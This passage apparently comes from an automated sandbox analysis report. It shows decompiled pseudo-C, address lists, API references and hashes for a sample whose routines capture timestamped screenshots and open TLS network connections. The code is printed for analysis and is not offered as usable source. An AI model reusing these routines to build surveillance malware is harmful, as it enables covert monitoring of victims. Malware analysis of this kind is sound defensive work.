                                                                                                0x0041640d
                                                                                                0x00416410
                                                                                                0x00416458
                                                                                                0x0041645c
                                                                                                0x00416466
                                                                                                0x0041646b
                                                                                                0x00416470
                                                                                                0x00416475
                                                                                                0x0041647a
                                                                                                0x00416488
                                                                                                0x0041648d
                                                                                                0x004164cc
                                                                                                0x004164d4
                                                                                                0x004164dc
                                                                                                0x004164e7
                                                                                                0x004164ef
                                                                                                0x004164f7
                                                                                                0x004164fc
                                                                                                0x00416509
                                                                                                0x0041650c
                                                                                                0x0041652a
                                                                                                0x0041652c
                                                                                                0x00416543
                                                                                                0x00416543
                                                                                                0x0041650e
                                                                                                0x00416522
                                                                                                0x00416522
                                                                                                0x0041654b
                                                                                                0x0041654d
                                                                                                0x00000000
                                                                                                0x0041654d
                                                                                                0x00416412
                                                                                                0x00416417
                                                                                                0x0041641a
                                                                                                0x0041641a
                                                                                                0x0041641c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041642c
                                                                                                0x00416431
                                                                                                0x00416437
                                                                                                0x0041643e
                                                                                                0x00416443
                                                                                                0x00416446
                                                                                                0x00416448
                                                                                                0x0041644d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00416454
                                                                                                0x00416454
                                                                                                0x00000000
                                                                                                0x0041641a

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00416310
                                                                                                • GdiplusStartup.GDIPLUS(0046DE94,?,00000000), ref: 00416342
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                  • Part of subcall function 00416141: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 0041619A
                                                                                                  • Part of subcall function 00416141: DeleteFileW.KERNEL32(00000000,0000001B), ref: 0041622B
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004163CE
                                                                                                • Sleep.KERNEL32(000003E8), ref: 00416454
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041645C
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041654B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                                                                                                • String ID: hpg$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$xF$xF
                                                                                                • API String ID: 3280235481-2293023947
                                                                                                • Opcode ID: 313b1be5ae3372f7bd9e64ce5b0250c6ad060bfb1c1ab4b838b2b67b7bf01a3c
                                                                                                • Instruction ID: 74a208efe839abcac81c568a116496f0d886130fd42da51a66afaadc87193c6b
                                                                                                • Opcode Fuzzy Hash: 313b1be5ae3372f7bd9e64ce5b0250c6ad060bfb1c1ab4b838b2b67b7bf01a3c
                                                                                                • Instruction Fuzzy Hash: B0519270A002189ACB14FBB6C856AED77A99F55308F40007FF906A71D2EE7C8D85C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004049DE, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E004049DE(void* __ecx, void* __esi) {
				char _v32;
				void* __ebx;
				void* __edi;
				intOrPtr _t21;
				int _t22;
				void* _t26;
				signed int _t31;
				void* _t32;
				void* _t33;
				struct _SECURITY_ATTRIBUTES* _t34;
				void* _t42;
				void* _t43;
				void* _t51;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t58;
				void* _t80;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t101;
				void* _t102;

				_t83 = __esi;
				_t54 = __ecx;
				_t21 =  *0x46dacc; // 0x0
				_t85 = _t84 - 0x1c;
				_t81 = __ecx;
				_t3 = _t81 + 4; // 0xffffffff
				__imp__#4( *_t3,  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t80, _t51);
				if(_t21 != 0) {
					__eflags =  *((char*)(__ecx + 0x31));
					if( *((char*)(__ecx + 0x31)) != 0) {
						__imp__#111();
						_t56 = _t21 - 0x2736;
						__eflags = _t56;
						if(_t56 != 0) {
							__eflags = _t56 == 0x17;
							if(_t56 == 0x17) {
								_t86 = _t85 - 0x18;
								_t58 = _t85 - 0x18;
								_push("Connection Refused");
								goto L20;
							} else {
								_t26 = E00418C47( &_v32, _t21);
								_t89 = _t85 - 0x18;
								E004053F2(_t51, _t85 - 0x18, "Connection Failed: ", _t81, __eflags, _t26);
								E00402076(_t51, _t89 - 0x14, "E");
								E00417670(_t51, _t81);
								E00401FB9();
							}
						}
					}
					goto L21;
				} else {
					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
						L14:
						_t22 = 1;
					} else {
						_t105 =  *((intOrPtr*)(__ecx + 0x31)) - _t21;
						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
							_t101 = _t85 - 0x18;
							_t6 = _t81 + 0x34; // 0x46e29c
							E00405416(_t101, "TLS Handshake...      | ", _t105, _t6);
							_t102 = _t101 - 0x14;
							_t54 = _t102;
							E00402076(_t51, _t102, "i");
							E00417670(_t51, _t81);
							_t85 = _t102 + 0x30;
						}
						_t31 = E0041D1EF(_t51, _t54);
						 *(_t81 + 0x4c) = _t31;
						if(_t31 != 0) {
							_t8 = _t81 + 4; // 0xffffffff
							_t78 =  *_t8;
							_t32 = E0041D413(_t31,  *_t8);
							__eflags = _t32 - 1;
							if(_t32 == 1) {
								_t33 = E0041DF42();
								__eflags = _t33 - 1;
								if(_t33 == 1) {
									_t34 = E0041D38A(_t51);
									 *((intOrPtr*)(_t81 + 0x50)) = _t34;
									__eflags = _t34;
									if(_t34 == 0) {
										_t92 = _t85 - 0x18;
										E00402076(_t51, _t85 - 0x18, "TLS Error 3");
										E00402076(_t51, _t92 - 0x18, "E");
										E00417670(_t51, _t81);
									}
									__eflags = 0;
									 *((intOrPtr*)(_t81 + 0x70)) = CreateEventW(0, 0, 1, 0);
									 *((intOrPtr*)(_t81 + 0x6c)) = CreateEventW(0, 0, 1, 0);
									goto L14;
								} else {
									_t95 = _t85 - 0x18;
									E00402076(_t51, _t85 - 0x18, "TLS Authentication Failed");
									E00402076(_t51, _t95 - 0x18, "E");
									_t42 = E00417670(_t51, _t81);
									_t13 = _t81 + 0x4c; // 0x0
									_t43 = E0041D63C(_t42,  *_t13);
									goto L8;
								}
							} else {
								_t98 = _t85 - 0x18;
								E00402076(_t51, _t85 - 0x18, "TLS Error 2");
								E00402076(_t51, _t98 - 0x18, "E");
								_t43 = E00417670(_t51, _t81);
								L8:
								_t9 = _t81 + 0x4c; // 0x0
								E0041D235(_t43, _t51,  *_t9, _t78, _t81, _t83);
								 *(_t81 + 0x4c) =  *(_t81 + 0x4c) & 0x00000000;
								goto L21;
							}
						} else {
							_t86 = _t85 - 0x18;
							_t58 = _t85 - 0x18;
							_push("TLS Error 1");
							L20:
							E00402076(_t51, _t58);
							E00402076(_t51, _t86 - 0x18, "E");
							E00417670(_t51, _t81);
							L21:
							_t22 = 0;
						}
					}
				}
				return _t22;
			}

























                                                                                                0x004049de
                                                                                                0x004049de
                                                                                                0x004049e1
                                                                                                0x004049e6
                                                                                                0x004049ee
                                                                                                0x004049f3
                                                                                                0x004049f6
                                                                                                0x004049fe
                                                                                                0x00404b31
                                                                                                0x00404b35
                                                                                                0x00404b37
                                                                                                0x00404b3f
                                                                                                0x00404b3f
                                                                                                0x00404b45
                                                                                                0x00404b47
                                                                                                0x00404b4a
                                                                                                0x00404b87
                                                                                                0x00404b8a
                                                                                                0x00404b8c
                                                                                                0x00000000
                                                                                                0x00404b4c
                                                                                                0x00404b51
                                                                                                0x00404b56
                                                                                                0x00404b61
                                                                                                0x00404b70
                                                                                                0x00404b75
                                                                                                0x00404b80
                                                                                                0x00404b80
                                                                                                0x00404b4a
                                                                                                0x00404b45
                                                                                                0x00000000
                                                                                                0x00404a04
                                                                                                0x00404a07
                                                                                                0x00404b2d
                                                                                                0x00404b2d
                                                                                                0x00404a0d
                                                                                                0x00404a0d
                                                                                                0x00404a10
                                                                                                0x00404a12
                                                                                                0x00404a15
                                                                                                0x00404a20
                                                                                                0x00404a25
                                                                                                0x00404a28
                                                                                                0x00404a2f
                                                                                                0x00404a34
                                                                                                0x00404a39
                                                                                                0x00404a39
                                                                                                0x00404a3c
                                                                                                0x00404a41
                                                                                                0x00404a46
                                                                                                0x00404a57
                                                                                                0x00404a57
                                                                                                0x00404a5c
                                                                                                0x00404a61
                                                                                                0x00404a64
                                                                                                0x00404aa0
                                                                                                0x00404aa5
                                                                                                0x00404aa8
                                                                                                0x00404add
                                                                                                0x00404ae2
                                                                                                0x00404ae5
                                                                                                0x00404ae7
                                                                                                0x00404ae9
                                                                                                0x00404af3
                                                                                                0x00404b02
                                                                                                0x00404b07
                                                                                                0x00404b0c
                                                                                                0x00404b0f
                                                                                                0x00404b21
                                                                                                0x00404b2a
                                                                                                0x00000000
                                                                                                0x00404aaa
                                                                                                0x00404aaa
                                                                                                0x00404ab4
                                                                                                0x00404ac3
                                                                                                0x00404ac8
                                                                                                0x00404acd
                                                                                                0x00404ad3
                                                                                                0x00000000
                                                                                                0x00404ad3
                                                                                                0x00404a66
                                                                                                0x00404a66
                                                                                                0x00404a70
                                                                                                0x00404a7f
                                                                                                0x00404a84
                                                                                                0x00404a8c
                                                                                                0x00404a8c
                                                                                                0x00404a8f
                                                                                                0x00404a94
                                                                                                0x00000000
                                                                                                0x00404a94
                                                                                                0x00404a48
                                                                                                0x00404a48
                                                                                                0x00404a4b
                                                                                                0x00404a4d
                                                                                                0x00404b91
                                                                                                0x00404b91
                                                                                                0x00404ba0
                                                                                                0x00404ba5
                                                                                                0x00404bad
                                                                                                0x00404bad
                                                                                                0x00404bad
                                                                                                0x00404a46
                                                                                                0x00404a07
                                                                                                0x00404bb4

                                                                                                APIs
                                                                                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,00404BD8,0000000C,00000000), ref: 00404B16
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,00404BD8,0000000C,00000000), ref: 00404B24
                                                                                                • WSAGetLastError.WS2_32(?,00404BD8,0000000C,00000000), ref: 00404B37
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 8fef071ab9383901f1b295146032d939836121d8be598bc45199595a59577687
                                                                                                • Instruction ID: b28af7c78457be51f7caf1b04bd0ab349764154e9a31ca13bace76ce62a494c6
                                                                                                • Opcode Fuzzy Hash: 8fef071ab9383901f1b295146032d939836121d8be598bc45199595a59577687
                                                                                                • Instruction Fuzzy Hash: 3E41DBB1F4060177D604B77AC91BA6E7629AB81358B40412FF50216AD3EA7DD860C7DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00449AD0, Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E00449AD0(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E00440628(0, 1, 0x50);
					_v8 = _t234;
					E004414D5(0);
					if(_t234 != 0) {
						_t227 = E00440628(0, 1, 4);
						_v12 = _t227;
						E004414D5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46c178, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E00440628(0, 1, 4);
							_v16 = _t232;
							E004414D5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0044C344(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044C344(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044C344(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044C344(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044C344(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044C344(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044C344(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044C344(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044C344(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044C344(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0044C344(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044C344(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044C344(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044C344(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044C344(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044C344(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044C344(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044C344(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044C344(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044C344(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044C344(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E004499D2(_v8);
								E004414D5(_v8);
								E004414D5(_v12);
								E004414D5(_v16);
								goto L4;
							}
							E004414D5(_t234);
							E004414D5(_v12);
							L7:
							goto L4;
						}
						E004414D5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46c178;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004414D5( *(_t210 + 0x88));
							E004414D5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}












































                                                                                                0x00449ad0
                                                                                                0x00449ad9
                                                                                                0x00449ae0
                                                                                                0x00449ae3
                                                                                                0x00449ae6
                                                                                                0x00449aef
                                                                                                0x00449b11
                                                                                                0x00449b15
                                                                                                0x00449b18
                                                                                                0x00449b22
                                                                                                0x00449b35
                                                                                                0x00449b39
                                                                                                0x00449b3c
                                                                                                0x00449b46
                                                                                                0x00449b58
                                                                                                0x00449dee
                                                                                                0x00449def
                                                                                                0x00449df1
                                                                                                0x00449df9
                                                                                                0x00449dfd
                                                                                                0x00449e02
                                                                                                0x00449e0d
                                                                                                0x00449e19
                                                                                                0x00449e25
                                                                                                0x00449e31
                                                                                                0x00449e37
                                                                                                0x00449e3b
                                                                                                0x00449e3d
                                                                                                0x00449e3d
                                                                                                0x00000000
                                                                                                0x00449e3b
                                                                                                0x00449b67
                                                                                                0x00449b6b
                                                                                                0x00449b6e
                                                                                                0x00449b78
                                                                                                0x00449b8c
                                                                                                0x00449b92
                                                                                                0x00449ba7
                                                                                                0x00449bbb
                                                                                                0x00449bd2
                                                                                                0x00449bec
                                                                                                0x00449bf4
                                                                                                0x00449c06
                                                                                                0x00449c1d
                                                                                                0x00449c34
                                                                                                0x00449c4e
                                                                                                0x00449c65
                                                                                                0x00449c7c
                                                                                                0x00449c93
                                                                                                0x00449cad
                                                                                                0x00449cc4
                                                                                                0x00449cdb
                                                                                                0x00449cf2
                                                                                                0x00449d0c
                                                                                                0x00449d23
                                                                                                0x00449d3a
                                                                                                0x00449d51
                                                                                                0x00449d6b
                                                                                                0x00449d87
                                                                                                0x00449db5
                                                                                                0x00449dc8
                                                                                                0x00449db9
                                                                                                0x00449dbd
                                                                                                0x00449dd1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00449dd3
                                                                                                0x00449dd5
                                                                                                0x00449dd8
                                                                                                0x00449dda
                                                                                                0x00449ddd
                                                                                                0x00449dc3
                                                                                                0x00449dc5
                                                                                                0x00449dc7
                                                                                                0x00449dc7
                                                                                                0x00449dc7
                                                                                                0x00449dbd
                                                                                                0x00000000
                                                                                                0x00449dcd
                                                                                                0x00449d8d
                                                                                                0x00449d93
                                                                                                0x00449d9c
                                                                                                0x00449da5
                                                                                                0x00000000
                                                                                                0x00449daa
                                                                                                0x00449b7b
                                                                                                0x00449b84
                                                                                                0x00449b4e
                                                                                                0x00000000
                                                                                                0x00449b4e
                                                                                                0x00449b49
                                                                                                0x00000000
                                                                                                0x00449b49
                                                                                                0x00449b24
                                                                                                0x00000000
                                                                                                0x00449af9
                                                                                                0x00449af9
                                                                                                0x00449afb
                                                                                                0x00449afe
                                                                                                0x00449e3f
                                                                                                0x00449e3f
                                                                                                0x00449e47
                                                                                                0x00449e49
                                                                                                0x00449e49
                                                                                                0x00449e51
                                                                                                0x00449e56
                                                                                                0x00449e5a
                                                                                                0x00449e62
                                                                                                0x00449e6a
                                                                                                0x00449e70
                                                                                                0x00449e5a
                                                                                                0x00449e74
                                                                                                0x00449e79
                                                                                                0x00449e7f
                                                                                                0x00000000
                                                                                                0x00449e7f

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 379b776cd4db7c6d47c6fed2fecee08d894be6b99d165cf0dac9491f38540c5d
                                                                                                • Instruction ID: 60f97a274b605075af4bdc0fb22cd58207239f416a6aac486b6092a6b1b80701
                                                                                                • Opcode Fuzzy Hash: 379b776cd4db7c6d47c6fed2fecee08d894be6b99d165cf0dac9491f38540c5d
                                                                                                • Instruction Fuzzy Hash: 52C13571D40204AFEB60DFA9CC82FEF77F8AB44714F14416AFA05EB282D6749D419758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404F18, Relevance: 18.1, APIs: 12, Instructions: 60synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E00404F18(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t29;
				int _t32;
				long _t33;
				long _t36;
				void* _t48;
				void* _t50;

				_t48 = __edx;
				_t50 = __ecx;
				_t1 = _t50 + 0x68; // 0x0
				_t29 = WaitForSingleObject( *_t1, 0xffffffff);
				if( *(_t50 + 4) != 0xffffffff) {
					_t5 = _t50 + 4; // 0xffffffff
					__imp__#3( *_t5);
					if(_t29 == 0) {
						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
					}
					_t45 = _t50;
					if(E004047EB(_t50) != 0) {
						E004051C8(_t45, _t48, 1);
					}
					if( *((char*)(_t50 + 1)) != 0) {
						_t9 = _t50 + 0x70; // 0x0
						_t33 = WaitForSingleObject( *_t9, 0xffffffff);
						_t10 = _t50 + 0x50; // 0x0
						E0041D235(_t33, CloseHandle,  *_t10, _t48, SetEvent, _t50);
						_t11 = _t50 + 0x70; // 0x0
						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
						SetEvent( *_t11);
						_t14 = _t50 + 0x6c; // 0x0
						_t36 = WaitForSingleObject( *_t14, 0xffffffff);
						_t15 = _t50 + 0x4c; // 0x0
						E0041D235(_t36, CloseHandle,  *_t15, _t48, SetEvent, _t50);
						_t16 = _t50 + 0x6c; // 0x0
						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
						SetEvent( *_t16);
						_t19 = _t50 + 0x70; // 0x0
						CloseHandle( *_t19);
						_t20 = _t50 + 0x6c; // 0x0
						CloseHandle( *_t20);
						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
					}
					_t25 = _t50 + 0x68; // 0x0
					SetEvent( *_t25);
					_t26 = _t50 + 0x68; // 0x0
					_t32 = CloseHandle( *_t26);
				} else {
					_t3 = _t50 + 0x68; // 0x0
					SetEvent( *_t3);
					_t4 = _t50 + 0x68; // 0x0
					_t32 = CloseHandle( *_t4);
				}
				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
				return _t32;
			}












                                                                                                0x00404f18
                                                                                                0x00404f1b
                                                                                                0x00404f1f
                                                                                                0x00404f22
                                                                                                0x00404f2c
                                                                                                0x00404f45
                                                                                                0x00404f48
                                                                                                0x00404f50
                                                                                                0x00404f52
                                                                                                0x00404f52
                                                                                                0x00404f56
                                                                                                0x00404f5f
                                                                                                0x00404f63
                                                                                                0x00404f63
                                                                                                0x00404f78
                                                                                                0x00404f7c
                                                                                                0x00404f7f
                                                                                                0x00404f85
                                                                                                0x00404f88
                                                                                                0x00404f8d
                                                                                                0x00404f90
                                                                                                0x00404f94
                                                                                                0x00404f98
                                                                                                0x00404f9b
                                                                                                0x00404fa1
                                                                                                0x00404fa4
                                                                                                0x00404fa9
                                                                                                0x00404fac
                                                                                                0x00404fb0
                                                                                                0x00404fb2
                                                                                                0x00404fb5
                                                                                                0x00404fb7
                                                                                                0x00404fba
                                                                                                0x00404fbc
                                                                                                0x00404fc0
                                                                                                0x00404fc0
                                                                                                0x00404fc4
                                                                                                0x00404fc7
                                                                                                0x00404fc9
                                                                                                0x00404fcc
                                                                                                0x00404f2e
                                                                                                0x00404f2e
                                                                                                0x00404f31
                                                                                                0x00404f37
                                                                                                0x00404f3a
                                                                                                0x00404f3a
                                                                                                0x00404fce
                                                                                                0x00404fd5

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                • closesocket.WS2_32(FFFFFFFF), ref: 00404F48
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404F7F
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F94
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404F9B
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FB0
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FB5
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FBA
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FC7
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FCC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 799248718991efb6832a4a5a939dbaa35ca11c72f35604757b2b7cf89567cee6
                                                                                                • Instruction ID: e72ad4899674d7cbad9bde08c7a86c747e4a32ce43b4c226188045091251e1ff
                                                                                                • Opcode Fuzzy Hash: 799248718991efb6832a4a5a939dbaa35ca11c72f35604757b2b7cf89567cee6
                                                                                                • Instruction Fuzzy Hash: AB213E71004B11AFDB316B22DC48B16BBE1FF8036AF104A6DF1A615AF1CB75E851DB08
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00410334, Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 374filesleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00410334(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
